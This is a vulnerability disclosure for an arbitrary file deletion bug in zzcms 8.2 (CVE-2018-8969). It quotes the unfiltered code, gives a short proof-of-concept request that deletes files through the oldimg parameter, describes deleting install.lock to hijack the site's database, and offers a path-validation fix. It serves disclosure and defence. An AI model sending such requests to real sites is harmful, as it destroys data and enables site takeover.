CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

user/licence_save.php

Edition:

zzcms 8.2

Location

/user/licence_save.php

Code:

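// $oldimg is taken from the request and is not filtered
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
    $f="…/".$oldimg;
    if (file_exists($f)){
        unlink($f);
    }
    // the "_small" variant of the same name is deleted as well
    $fs="…/".str_replace(".","_small.",$oldimg)."";
    if (file_exists($fs)){
        unlink($fs);
    }
}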

Rows: 31

Harm

Allows attackers to delete files arbitrarily

Cause

The code shows that oldimg is the only value we need to control, and that it is not filtered before it is used.

First, create test.php.

Then perform the operation, making sure the condition $oldimg<>$img && $oldimg<>"/image/nopic.gif" is met.

Then execute it.

Afterwards, test.php is gone.

PoC

GET: http://127.0.0.1:8080/user/licence_save.php?action=modify
POST: id=11&oldimg=test.php&img=1231

An attacker can use this vulnerability to delete any file, for example deleting install.lock to trigger a CMS reinstall and hijack the website database.

Solution

Filter the user-controlled input parameters: strictly validate the type of each parameter and the file suffix.
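
One way to implement the filtering described under Solution, as an added example that is not zzcms code: the requested name is resolved with realpath(), required to stay inside a single image directory, and required to carry an image suffix. The function name delete_old_image, the uploads directory and the suffix list are assumptions made for this example.

```php
<?php
// Added example, not zzcms code. Function name, directory and suffix list are assumptions.
const ALLOWED_SUFFIXES = ['jpg', 'jpeg', 'png', 'gif'];

// Delete an old image only if it resolves to a regular file inside $baseDir
// and has an allowed image suffix. Returns true only when a file was removed.
function delete_old_image(string $baseDir, string $oldimg): bool
{
    if ($oldimg === '' || strpos($oldimg, "\0") !== false) {
        return false;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }
    // realpath() collapses "../" and resolves symlinks; false means no such file.
    $target = realpath($base . DIRECTORY_SEPARATOR . ltrim($oldimg, '/\\'));
    if ($target === false || !is_file($target)) {
        return false;
    }
    // Containment check on the resolved path; the trailing separator stops a
    // sibling such as "uploads_other" from passing as a child of "uploads".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    // Suffix check on the resolved file, not on the raw request value.
    $suffix = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!in_array($suffix, ALLOWED_SUFFIXES, true)) {
        return false;
    }
    return unlink($target);
}

// Constructed demo in a temporary tree: one image inside the upload directory,
// one lock file outside it.
$root = sys_get_temp_dir() . '/zz_demo_' . bin2hex(random_bytes(4));
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/uploads/old.png", 'x');
file_put_contents("$root/install.lock", 'x');

var_dump(delete_old_image("$root/uploads", '../install.lock')); // traversal attempt
var_dump(delete_old_image("$root/uploads", 'old.png'));         // legitimate image
var_dump(file_exists("$root/install.lock"));                    // lock file state afterwards
```

The same checks would have to be applied to the "_small" variant before it is deleted.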
